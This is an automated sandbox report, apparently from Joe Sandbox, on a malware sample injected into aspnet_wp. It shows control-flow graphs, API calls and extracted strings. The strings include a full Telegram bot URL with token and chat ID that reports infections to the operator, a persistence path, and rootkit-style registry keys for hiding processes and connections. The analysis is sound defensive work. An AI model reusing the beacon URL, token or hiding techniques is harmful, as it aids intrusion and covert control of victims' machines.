                                                                                                                                                                                            control_flow_graph 51 401980-4019f2 call 4036e0 GetConsoleWindow 55 4019f6-401a37 call 4037b0 call 401550 call 4037e0 51->55 63 401a3d-401a53 call 4037e0 55->63 64 401eae-401edb call 4037e0 call 4037d8 call 4037f0 fclose 55->64 63->55 70 401a55-401a80 call 4037c0 call 4037f0 call 403720 63->70 77 401ee0-401ef8 64->77 86 401a86-401adb call 40bda0 call 4037a8 * 2 call 4037e0 70->86 87 401f18-401f64 call 40bda0 GetVolumeInformationA 70->87 79 401c52-401c59 77->79 80 401efe-401f13 call 401720 77->80 82 401c60-401c68 79->82 89 401cb1-401cb4 80->89 101 401bf0-401bf5 SleepEx 82->101 119 401d40-401d56 86->119 120 401ae1-401b2a GetVolumeInformationA 86->120 98 401f86-40201d call 401550 InternetOpenA InternetOpenUrlA 87->98 99 401f66-401f85 87->99 89->79 92 401cb6-401cc3 call 403788 89->92 92->79 104 401cc5-401d3b call 403768 call 403778 call 403780 call 4037c8 92->104 115 40203a-402050 InternetReadFile 98->115 116 40201f-402026 98->116 105 401bfb-401c10 call 403720 101->105 104->82 128 401c12-401c1c 105->128 129 401c6a-401c6e 105->129 122 402030-402038 115->122 123 402052-40205c InternetCloseHandle 115->123 121 40205e-402066 call 401570 116->121 130 401d92-401d9d call 4037e8 119->130 126 401b30-401bce call 403790 call 401550 InternetOpenA 120->126 127 4021f4-4021f8 120->127 141 40206b-4020cd call 4037a0 * 2 121->141 122->115 122->123 123->121 159 401e51-401e63 126->159 177 401bd4-401bde call 401570 126->177 127->99 128->101 143 401c1e-401c3b 128->143 129->55 134 401da2-401da5 130->134 138 401e40-401e43 call 4037f0 134->138 139 401dab-401db6 call 403778 134->139 149 401e48 138->149 155 401dc4-401ddc 139->155 156 401db8-401dbd 139->156 166 4020e4-4020eb 141->166 143->79 167 401c3d-401c50 call 403778 143->167 149->159 161 401d60-401d75 call 403820 155->161 162 401dde-401de6 155->162 156->155 160 401dbf 156->160 168 401e6c-401e7f 159->168 160->155 182 401d78-401d7f 161->182 162->161 169 401dec-401e04 162->169 188 4020dc 166->188 189 4020ed-40210a 166->189 167->79 185 401c73-401c8b 167->185 186 401e81-401e8d 168->186 187 401e65-401e6a 168->187 174 401e92-401ea9 call 403820 169->174 175 401e0a-401e1b call 401650 169->175 174->182 175->182 197 401e21-401e3a call 403768 175->197 198 401be3-401be7 177->198 182->138 191 401d85-401d8c 182->191 195 401c9b-401cae call 401720 185->195 196 401c8d-401c95 185->196 186->174 187->168 187->186 188->166 209 4020d0-4020d6 189->209 210 40210c-40211f call 403778 189->210 191->130 191->138 195->89 196->77 196->195 197->138 197->191 198->105 209->188 210->209 214 402121-402136 210->214 215 402147-402164 call 401720 214->215 216 402138-402141 214->216 222 402167-40216e 215->222 216->215 217 402200-402215 216->217 217->209 219 40221b-40223b call 401720 217->219 219->222 222->209 224 402174-402185 call 403788 222->224 224->209 227 40218b-4021ef call 403768 call 403778 call 403780 call 4037c8 224->227 227->209
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetConsoleWindow.KERNELBASE ref: 004019A8
                                                                                                                                                                                            • GetVolumeInformationA.KERNELBASE ref: 00401B22
                                                                                                                                                                                            • InternetOpenA.WININET ref: 00401B94
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3891911934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_400000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ConsoleInformationInternetOpenVolumeWindow
                                                                                                                                                                                            • String ID: %ld$%llu$%s&text=User %.10s ran the malware$%s\Microsoft\Windows\Start Menu\tc.txt$APPDATA$C:\$MyApp$bc1$https://api.telegram.org$https://api.telegram.org/bot6389892231:AAEdDUVYYFJmNDGihmXB4rLw0iSrrh-e2fE/sendMessage?chat_id=6585536474&text=User %llu ran the malware
                                                                                                                                                                                            • API String ID: 2178934817-2152422893
                                                                                                                                                                                            • Opcode ID: 98f2fb83b7ef7a145ec376ce7f06ffd3d585f49990aee3f22b93aed1cf4ff8b6
                                                                                                                                                                                            • Instruction ID: b1bf8352c78a68e0c0e4b7c04ffcf9fd93a921bd85e2ea35f57682150d57c7cb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 98f2fb83b7ef7a145ec376ce7f06ffd3d585f49990aee3f22b93aed1cf4ff8b6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E2280A1300B5095EB109F62E8553AE2765F749BC8F44513AEF4E67BA4EF3CC646C388
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 242 2109c3c2b2c-2109c3c2b97 call 2109c3e2ce0 244 2109c3c2b9d-2109c3c2ba5 242->244 245 2109c3c2bab-2109c3c2bb1 244->245 246 2109c3c2ee0-2109c3c2f03 244->246 245->246 247 2109c3c2bb7-2109c3c2bba 245->247 247->246 248 2109c3c2bc0-2109c3c2bc3 247->248 248->246 249 2109c3c2bc9-2109c3c2bd9 GetModuleHandleA 248->249 250 2109c3c2bed 249->250 251 2109c3c2bdb-2109c3c2beb GetProcAddress 249->251 252 2109c3c2bf0-2109c3c2c0e 250->252 251->252 252->246 254 2109c3c2c14-2109c3c2c33 StrCmpNIW 252->254 254->246 255 2109c3c2c39-2109c3c2c3d 254->255 255->246 256 2109c3c2c43-2109c3c2c4d 255->256 256->246 257 2109c3c2c53-2109c3c2c5a 256->257 257->246 258 2109c3c2c60-2109c3c2c73 257->258 259 2109c3c2c75-2109c3c2c81 258->259 260 2109c3c2c83 258->260 261 2109c3c2c86-2109c3c2c8a 259->261 260->261 262 2109c3c2c8c-2109c3c2c98 261->262 263 2109c3c2c9a 261->263 264 2109c3c2c9d-2109c3c2ca7 262->264 263->264 265 2109c3c2d9d-2109c3c2da1 264->265 266 2109c3c2cad-2109c3c2cb0 264->266 267 2109c3c2da7-2109c3c2daa 265->267 268 2109c3c2ed2-2109c3c2eda 265->268 269 2109c3c2cc2-2109c3c2ccc 266->269 270 2109c3c2cb2-2109c3c2cbf call 2109c3c199c 266->270 271 2109c3c2dac-2109c3c2db8 call 2109c3c199c 267->271 272 2109c3c2dbb-2109c3c2dc5 267->272 268->246 268->258 274 2109c3c2cce-2109c3c2cdb 269->274 275 2109c3c2d00-2109c3c2d0a 269->275 270->269 271->272 280 2109c3c2df5-2109c3c2df8 272->280 281 2109c3c2dc7-2109c3c2dd4 272->281 274->275 276 2109c3c2cdd-2109c3c2cea 274->276 277 2109c3c2d0c-2109c3c2d19 275->277 278 2109c3c2d3a-2109c3c2d3d 275->278 285 2109c3c2ced-2109c3c2cf3 276->285 277->278 286 2109c3c2d1b-2109c3c2d28 277->286 287 2109c3c2d3f-2109c3c2d49 call 2109c3c1bbc 278->287 288 2109c3c2d4b-2109c3c2d58 lstrlenW 278->288 283 2109c3c2dfa-2109c3c2e03 call 2109c3c1bbc 280->283 284 2109c3c2e05-2109c3c2e12 lstrlenW 280->284 281->280 290 2109c3c2dd6-2109c3c2de3 281->290 283->284 310 2109c3c2e4a-2109c3c2e55 283->310 294 2109c3c2e14-2109c3c2e1e 284->294 295 2109c3c2e35-2109c3c2e3f call 2109c3c3844 284->295 292 2109c3c2cf9-2109c3c2cfe 285->292 293 2109c3c2d93-2109c3c2d98 285->293 296 2109c3c2d2b-2109c3c2d31 286->296 287->288 287->293 298 2109c3c2d5a-2109c3c2d64 288->298 299 2109c3c2d7b-2109c3c2d8d call 2109c3c3844 288->299 300 2109c3c2de6-2109c3c2dec 290->300 292->275 292->285 303 2109c3c2e42-2109c3c2e44 293->303 294->295 304 2109c3c2e20-2109c3c2e33 call 2109c3c152c 294->304 295->303 296->293 305 2109c3c2d33-2109c3c2d38 296->305 298->299 308 2109c3c2d66-2109c3c2d79 call 2109c3c152c 298->308 299->293 299->303 309 2109c3c2dee-2109c3c2df3 300->309 300->310 303->268 303->310 304->295 304->310 305->278 305->296 308->293 308->299 309->280 309->300 314 2109c3c2ecc-2109c3c2ed0 310->314 315 2109c3c2e57-2109c3c2e5b 310->315 314->268 319 2109c3c2e5d-2109c3c2e61 315->319 320 2109c3c2e63-2109c3c2e7d call 2109c3c85c0 315->320 319->320 322 2109c3c2e80-2109c3c2e83 319->322 320->322 324 2109c3c2e85-2109c3c2ea3 call 2109c3c85c0 322->324 325 2109c3c2ea6-2109c3c2ea9 322->325 324->325 325->314 327 2109c3c2eab-2109c3c2ec9 call 2109c3c85c0 325->327 327->314
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                                                                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                                                                                            • API String ID: 2119608203-3850299575
                                                                                                                                                                                            • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                                                                                            • Instruction ID: 332373d6f5914f3162948b0acee34d8cf8b96568aa2a432e5bd5263797161c4a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                                                                                            • Instruction Fuzzy Hash: 33B18072A50A58C2EB549F26C6A87ED63A4F764F84F04D016DE8963797DFB6CAC0C340
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C202C Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 162COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 498 2109c3c202c-2109c3c2057 call 2109c3e2d00 500 2109c3c205d-2109c3c2066 498->500 501 2109c3c206f-2109c3c2072 500->501 502 2109c3c2068-2109c3c206c 500->502 503 2109c3c2078-2109c3c207b 501->503 504 2109c3c2223-2109c3c2243 501->504 502->501 505 2109c3c2081-2109c3c2093 503->505 506 2109c3c2173-2109c3c2176 503->506 505->504 509 2109c3c2099-2109c3c20a5 505->509 507 2109c3c2178-2109c3c2192 call 2109c3c2f04 506->507 508 2109c3c21e7-2109c3c21ea 506->508 507->504 518 2109c3c2198-2109c3c21ae 507->518 508->504 513 2109c3c21ec-2109c3c21ff call 2109c3c2f04 508->513 511 2109c3c20a7-2109c3c20b7 509->511 512 2109c3c20d3-2109c3c20de call 2109c3c1bbc 509->512 511->512 515 2109c3c20b9-2109c3c20d1 StrCmpNIW 511->515 519 2109c3c20ff-2109c3c2111 512->519 526 2109c3c20e0-2109c3c20f8 call 2109c3c1bf4 512->526 513->504 525 2109c3c2201-2109c3c2209 513->525 515->512 515->519 518->504 524 2109c3c21b0-2109c3c21cc 518->524 522 2109c3c2121-2109c3c2123 519->522 523 2109c3c2113-2109c3c2115 519->523 529 2109c3c212a 522->529 530 2109c3c2125-2109c3c2128 522->530 527 2109c3c211c-2109c3c211f 523->527 528 2109c3c2117-2109c3c211a 523->528 531 2109c3c21d0-2109c3c21e3 524->531 525->504 532 2109c3c220b-2109c3c2213 525->532 526->519 538 2109c3c20fa-2109c3c20fd 526->538 535 2109c3c212d-2109c3c2130 527->535 528->535 529->535 530->535 531->531 536 2109c3c21e5 531->536 537 2109c3c2216-2109c3c2221 532->537 539 2109c3c213e-2109c3c2141 535->539 540 2109c3c2132-2109c3c2138 535->540 536->504 537->504 537->537 538->535 539->504 541 2109c3c2147-2109c3c214b 539->541 540->509 540->539 542 2109c3c214d-2109c3c2150 541->542 543 2109c3c2162-2109c3c216e 541->543 542->504 544 2109c3c2156-2109c3c215b 542->544 543->504 544->541 545 2109c3c215d 544->545 545->504
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                                                                                            • String ID: S$dialer
                                                                                                                                                                                            • API String ID: 756756679-3873981283
                                                                                                                                                                                            • Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                                                                                                                                            • Instruction ID: 3ff51dba6e75028e489bb55dd093e52d12fdf48b34cfc28511b75bcc2db958d7
                                                                                                                                                                                            • Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                                                                                                                                            • Instruction Fuzzy Hash: D151BF32F5062CC6E765CB26AA986ED63A5F724B94F04C011DF8522B87DBB6DAC1C340
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00401180 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 198COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 593 401180-4011ae 594 401470-401479 593->594 595 4011b4-4011d1 593->595 604 401480-401499 call 403830 594->604 596 4011e4-4011ef 595->596 597 4011f1-4011ff 596->597 598 4011d3-4011d6 596->598 602 401205-401209 597->602 603 401427-401436 call 403840 597->603 600 401410-401421 598->600 601 4011dc 598->601 600->602 600->603 601->596 602->604 605 40120f-40121e 602->605 607 401224-401226 603->607 608 40143c-401457 call 403830 603->608 619 40149e-4014d1 call 4037f8 call 402350 call 401180 604->619 605->607 605->608 612 40122c-401239 607->612 613 40145d-401462 607->613 608->612 608->613 616 401247-401294 call 402950 SetUnhandledExceptionFilter call 402db0 call 4038a0 call 402750 call 4038c0 612->616 617 40123b-401243 612->617 613->612 635 4012b2-4012b8 616->635 636 401296 616->636 617->616 638 4012a0-4012a2 635->638 639 4012ba-4012c8 635->639 637 4012f7-4012fd 636->637 640 401315-40133a call 4037a8 637->640 641 4012ff-401309 637->641 642 4012d0-4012d2 638->642 643 4012a4-4012a7 638->643 644 4012ae 639->644 654 401387-4013c2 call 402310 call 403a10 640->654 655 40133c-401349 640->655 645 401400-401405 641->645 646 40130f 641->646 649 4012d4 642->649 650 4012e5-4012ee 642->650 643->642 648 4012a9 643->648 644->635 645->646 646->640 648->644 652 4012f0 649->652 651 4012e0-4012e3 650->651 650->652 651->650 651->652 652->637 662 4013c7-4013d5 654->662 657 401350-401380 call 403778 call 4037a8 call 4037a0 655->657 672 401382 657->672 662->619 664 4013db-4013e3 662->664 666 4013f0-4013ff 664->666 667 4013e5-4013ea call 403838 664->667 667->666 672->654
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNELBASE ref: 00401253
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3891911934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_400000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                            • String ID: pC
                                                                                                                                                                                            • API String ID: 3192549508-618396992
                                                                                                                                                                                            • Opcode ID: 58c16fb2d74b332cbb1ae3d73c7031563b2405748ab3bfa02381105ec46107aa
                                                                                                                                                                                            • Instruction ID: b3ced316d18715a27402a46344e87645ea85c1e443f96a312bc4d33b04486989
                                                                                                                                                                                            • Opcode Fuzzy Hash: 58c16fb2d74b332cbb1ae3d73c7031563b2405748ab3bfa02381105ec46107aa
                                                                                                                                                                                            • Instruction Fuzzy Hash: B681BDB560074485EB24AF56E88076A37A1F745B88F84903BEF89A73B1DF3DDA44C709
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C27FC Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 0185a08247f70f65e171097ef193af1ec7c797a8df345bba98632a27a4a0fbef
                                                                                                                                                                                            • Instruction ID: eea2192cb6394354ae0fb5d464cb523aab02e7df2f2365cebdbd54561224d7e4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0185a08247f70f65e171097ef193af1ec7c797a8df345bba98632a27a4a0fbef
                                                                                                                                                                                            • Instruction Fuzzy Hash: D221FD32A10749C6E324DF17A9E46AEB7A4F3A4F80F94C029DE9563752DF75CA828700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C28C8 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 35d1efe4857f8844a1db8c4c8ed7dc734db620b0767d36ab5b03d26aefcb1554
                                                                                                                                                                                            • Instruction ID: 7c84cd3fbc0ec65b4e6cc0acfc8c585f4e4cf35b6f31705d6648ffc13905f418
                                                                                                                                                                                            • Opcode Fuzzy Hash: 35d1efe4857f8844a1db8c4c8ed7dc734db620b0767d36ab5b03d26aefcb1554
                                                                                                                                                                                            • Instruction Fuzzy Hash: D321F032B00745C6E3609F07A9A46AEB7A4F3A4F80F54C129DEC56371ADF75CA918B00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                                                                                            • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                                                                            • API String ID: 2135414181-2879589442
                                                                                                                                                                                            • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                                                                                            • Instruction ID: 395c8c1472821f5bdb6892cfa38c494b88b3c60b2acfbd424fb60711aa35d443
                                                                                                                                                                                            • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                                                                                            • Instruction Fuzzy Hash: 24711876A10E18C6EB109F25E9A86DD33B4FBA4F88F00D111DE4E57B6ADE74C694D340
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                                                                                            • String ID: wr
                                                                                                                                                                                            • API String ID: 1092925422-2678910430
                                                                                                                                                                                            • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                                                                                            • Instruction ID: 4097d261a449ac3451a326376ca48a181b32c70eb99744c097cb7e8f6a5b2df6
                                                                                                                                                                                            • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 15117C36B04B45C2EF949B11E5A82E962B0F798F84F04C428DE9A03796EF7DC685C704
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 337 2109c3c5b30-2109c3c5b57 338 2109c3c5b59-2109c3c5b68 337->338 339 2109c3c5b6b-2109c3c5b76 GetCurrentThreadId 337->339 338->339 340 2109c3c5b78-2109c3c5b7d 339->340 341 2109c3c5b82-2109c3c5b89 339->341 342 2109c3c5faf-2109c3c5fc6 call 2109c3c7940 340->342 343 2109c3c5b9b-2109c3c5baf 341->343 344 2109c3c5b8b-2109c3c5b96 call 2109c3c5960 341->344 345 2109c3c5bbe-2109c3c5bc4 343->345 344->342 348 2109c3c5bca-2109c3c5bd3 345->348 349 2109c3c5c95-2109c3c5cb6 345->349 352 2109c3c5c1a-2109c3c5c8d call 2109c3c4510 call 2109c3c44b0 call 2109c3c4470 348->352 353 2109c3c5bd5-2109c3c5c18 call 2109c3c85c0 348->353 356 2109c3c5cbc-2109c3c5cdc GetThreadContext 349->356 357 2109c3c5e1f-2109c3c5e30 call 2109c3c74bf 349->357 364 2109c3c5c90 352->364 353->364 360 2109c3c5e1a 356->360 361 2109c3c5ce2-2109c3c5d03 356->361 371 2109c3c5e35-2109c3c5e3b 357->371 360->357 361->360 368 2109c3c5d09-2109c3c5d12 361->368 364->345 374 2109c3c5d14-2109c3c5d25 368->374 375 2109c3c5d92-2109c3c5da3 368->375 372 2109c3c5efe-2109c3c5f0e 371->372 373 2109c3c5e41-2109c3c5e98 VirtualProtect FlushInstructionCache 371->373 381 2109c3c5f1e-2109c3c5f2a call 2109c3c4df0 372->381 382 2109c3c5f10-2109c3c5f17 372->382 377 2109c3c5ec9-2109c3c5ef9 call 2109c3c78ac 373->377 378 2109c3c5e9a-2109c3c5ea4 373->378 383 2109c3c5d8d 374->383 384 2109c3c5d27-2109c3c5d3c 374->384 379 2109c3c5e15 375->379 380 2109c3c5da5-2109c3c5dc3 375->380 377->371 378->377 386 2109c3c5ea6-2109c3c5ec1 call 2109c3c4390 378->386 380->379 388 2109c3c5dc5-2109c3c5e0c call 2109c3c3900 380->388 401 2109c3c5f2f-2109c3c5f35 381->401 382->381 389 2109c3c5f19 call 2109c3c43e0 382->389 383->379 384->383 390 2109c3c5d3e-2109c3c5d88 call 2109c3c3970 SetThreadContext 384->390 386->377 388->379 404 2109c3c5e10 call 2109c3c74dd 388->404 389->381 390->383 402 2109c3c5f77-2109c3c5f95 401->402 403 2109c3c5f37-2109c3c5f75 ResumeThread call 2109c3c78ac 401->403 406 2109c3c5fa9 402->406 407 2109c3c5f97-2109c3c5fa6 402->407 403->401 404->379 406->342 407->406
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Thread$Current$Context
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1666949209-0
                                                                                                                                                                                            • Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                                                                                                                                                            • Instruction ID: 77bc16e8ce1ed2baf963936c5dd70134fe3e2e9b086318dc7030bf0ce2e0ebe8
                                                                                                                                                                                            • Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 58D17976648B48C2DA709B16E5A839E77A0F398F84F108116EECD57B66DF7CC681DB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 409 2109c3c50d0-2109c3c50fc 410 2109c3c510d-2109c3c5116 409->410 411 2109c3c50fe-2109c3c5106 409->411 412 2109c3c5118-2109c3c5120 410->412 413 2109c3c5127-2109c3c5130 410->413 411->410 412->413 414 2109c3c5141-2109c3c514a 413->414 415 2109c3c5132-2109c3c513a 413->415 416 2109c3c514c-2109c3c5151 414->416 417 2109c3c5156-2109c3c5161 GetCurrentThreadId 414->417 415->414 418 2109c3c56d3-2109c3c56da 416->418 419 2109c3c516d-2109c3c5174 417->419 420 2109c3c5163-2109c3c5168 417->420 421 2109c3c5176-2109c3c517c 419->421 422 2109c3c5181-2109c3c518a 419->422 420->418 421->418 423 2109c3c518c-2109c3c5191 422->423 424 2109c3c5196-2109c3c51a2 422->424 423->418 425 2109c3c51ce-2109c3c5225 call 2109c3c56e0 * 2 424->425 426 2109c3c51a4-2109c3c51c9 424->426 431 2109c3c523a-2109c3c5243 425->431 432 2109c3c5227-2109c3c522e 425->432 426->418 435 2109c3c5255-2109c3c525e 431->435 436 2109c3c5245-2109c3c5252 431->436 433 2109c3c5236 432->433 434 2109c3c5230 432->434 438 2109c3c52a6-2109c3c52aa 433->438 437 2109c3c52b0-2109c3c52b6 434->437 439 2109c3c5260-2109c3c5270 435->439 440 2109c3c5273-2109c3c5298 call 2109c3c7870 435->440 436->435 442 2109c3c52b8-2109c3c52d4 call 2109c3c4390 437->442 443 2109c3c52e5-2109c3c52eb 437->443 438->437 439->440 448 2109c3c532d-2109c3c5342 call 2109c3c3cc0 440->448 449 2109c3c529e 440->449 442->443 452 2109c3c52d6-2109c3c52de 442->452 446 2109c3c52ed-2109c3c530c call 2109c3c78ac 443->446 447 2109c3c5315-2109c3c5328 443->447 446->447 447->418 456 2109c3c5344-2109c3c534c 448->456 457 2109c3c5351-2109c3c535a 448->457 449->438 452->443 456->438 458 2109c3c536c-2109c3c53ba call 2109c3c8c60 457->458 459 2109c3c535c-2109c3c5369 457->459 462 2109c3c53c2-2109c3c53ca 458->462 459->458 463 2109c3c54d7-2109c3c54df 462->463 464 2109c3c53d0-2109c3c54bb call 2109c3c7440 462->464 465 2109c3c54e1-2109c3c54f4 call 2109c3c4590 463->465 466 2109c3c5523-2109c3c552b 463->466 476 2109c3c54bd 464->476 477 2109c3c54bf-2109c3c54ce call 2109c3c4060 464->477 478 2109c3c54f8-2109c3c5521 465->478 479 2109c3c54f6 465->479 469 2109c3c552d-2109c3c5535 466->469 470 2109c3c5537-2109c3c5546 466->470 469->470 473 2109c3c5554-2109c3c5561 469->473 474 2109c3c554f 470->474 475 2109c3c5548 470->475 480 2109c3c5564-2109c3c55b9 call 2109c3c85c0 473->480 481 2109c3c5563 473->481 474->473 